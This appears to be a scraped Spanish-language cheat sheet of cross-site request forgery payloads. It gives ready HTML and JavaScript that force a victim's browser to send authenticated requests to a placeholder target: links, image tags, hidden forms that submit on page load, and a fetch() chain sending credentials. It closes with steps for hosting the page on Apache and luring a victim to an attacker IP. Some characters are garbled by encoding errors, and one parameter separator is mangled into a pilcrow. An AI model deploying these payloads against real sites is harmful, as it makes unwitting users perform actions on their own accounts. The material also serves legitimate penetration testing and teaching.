HTML GET con interacción de usuario
Copiar < a href = "http://web-vulnerable.com/?param=CSRF" >Haz clic aquÃ</ a >
HTML GET sin interacción de usuario
Copiar < img src = "http://web-vulnerable.com/?param=CSRF" >
HTML POST con interacción de usuario
Copiar < form action = "http://web-vulnerable.com" method = "POST" >
< input name = "param" type = "hidden" value = "CSRF" />
< input type = "submit" value = "Haz clic aquÃ" />
</ form >
HTML POST sin interacción de usuario
Copiar < html >
< body onload = " document .forms['csrf'] .submit ()" >
< form action = "http://web-vulnerable.com" method = "POST" name = "csrf" >
< input name = "param" type = "hidden" value = "CSRF" />
</ form >
</ body >
</ html >
csrf-html-multi-post.html
Copiar < html >
< head >
< script >
function submitForms () {
document .forms[ 'csrf' ] .submit ();
document .forms[ 'csrf2' ] .submit ();
return false ;
}
</ script >
</ head >
< body onload = " submitForms ();" >
< form action = "http://web-vulnerable.com/api" method = "post" name = "csrf" target = "_blank" >
< input name = "param" type = "hidden" value = "value" />
</ form >
< form action = "http://web-vulnerable.com/api2" method = "post" name = "csrf2" target = "_blank" >
< input name = "param" type = "hidden" value = "value" />
</ form >
</ body >
</ html >
JavaScript fetch POST sin interacción de usuario
Copiar < html >
< head >
< script >
var host = "http://web-vulnerable.com" ;
var pathAPI = "/api" ;
var paramValueAPI = "value" ;
var param2ValueAPI = "value2" ;
var paramsAPI = "param=" + paramValueAPI + "¶m2=" + param2ValueAPI;
var pathAPI2 = "/api2" ;
var paramValueAPI2 = "value" ;
var param2ValueAPI2 = "value2" ;
var paramsAPI2 = "param=" + paramValueAPI2 + "¶m2=" + param2ValueAPI2;
function api () {
fetch (host + pathAPI , {
method : 'POST' ,
mode : 'no-cors' ,
credentials : 'include' ,
headers : {
'Content-Type' : 'application/x-www-form-urlencoded'
} ,
body : paramsAPI }
) .then ( function (response) {
console .log ( "API 1..." )
api2 ();
});
}
function api2 () {
fetch (host + pathAPI2 , {
method : 'POST' ,
mode : 'no-cors' ,
credentials : 'include' ,
headers : {
'Content-Type' : 'application/x-www-form-urlencoded'
} ,
body : paramsAPI2 }
) .then (
console .log ( "API 2..." )
);
}
api ();
</ script >
</ head >
< body >
</ body >
</ html >
Alojar y servir página maliciosa.
Copiar sudo systemctl start apache2
cd /var/www/html
VÃctima visita página maliciosa.
Copiar http:// <attacker-IP-address>:<port>/csrf.html